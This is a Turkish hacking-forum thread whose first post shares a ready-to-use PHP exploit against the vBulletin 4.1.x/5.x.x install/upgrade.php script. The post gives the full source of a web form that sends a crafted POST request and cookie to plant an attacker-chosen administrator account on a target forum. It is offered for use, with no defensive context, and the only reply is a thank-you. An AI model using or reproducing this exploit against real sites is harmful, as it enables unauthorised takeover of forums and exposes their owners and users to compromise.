İPUCU

Seçenekler

VBulletin 4.1.x / 5.x.x Upgrade 0day Exploit

24-10-2013 12:04
#1
S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
23
Mesajlar:
8.801
Teşekkür (Etti):
968
Teşekkür (Aldı):
3104
Konular:
1516
VBulletin 4.1.x / 5.x.x Upgrade 0day Exploit

vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit - YouTube

Videodaki php Kodlamaa

Kod:
<h1>vBulletin  4.1.x  /  5.x.x   Upgrade   0day  Exploit</h1>
<p>Created by: Boxhead</p>
<p>Found on: 08/22/2013</p>
<p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
<br>
<?php
//extract data from the post
if(isset($_POST['submit'])){
extract($_POST);

//set POST variables
$url = $_POST['url'];
$fields = array(
                        'ajax' => urlencode('1'),
                        'version' => urlencode('install'),
                        'checktable' => urlencode('false'),
                        'firstrun' => urlencode('false'),
                        'step' => urlencode('7'),
                        'startat' => urlencode('0'),
                        'only' => urlencode('false'),
                        'customerid' => urlencode($_POST['customerid']),
                        'options[skiptemplatemerge]' => urlencode('0'),
                        'response' => urlencode('yes'),
                        'htmlsubmit' => urlencode('1'),
                        'htmldata[username]' => urlencode($_POST['username']),
                        'htmldata[password]' => urlencode($_POST['password']),
                        'htmldata[confirmpassword]' => urlencode($_POST['password']),
                        'htmldata[email]' => urlencode($_POST['email'])
                );

//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');

//open connection
$ch = curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );

//execute post
$result = curl_exec($ch);

//close connection
curl_close($ch);
exit();
}
?>
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
  <span>Website:</span>
    <input name="url" type="text" tabindex="1" size="60" />
    <br>
    <span>Customer ID:</span>
    <input name="customerid" type="text" tabindex="2" size="40" />
    <br>
    <span>Username:</span>
    <input name="username" type="text" tabindex="3" size="40" />
    <br>
    <span>Password:</span>
    <input name="password" type="text" tabindex="4" size="40" />
    <br>
    <span>Email:</span>
    <input name="email" type="text" tabindex="5" maxlength="40" />
    
<input name="submit" type="submit" value="Inject Admin">
</form>
</center>
ByS3MTEXz Teşekkür etti.

26-02-2016 10:02
#2
F4R3L - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2016
Mesajlar:
75
Teşekkür (Etti):
0
Teşekkür (Aldı):
4
Konular:
8
Saol üstad

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı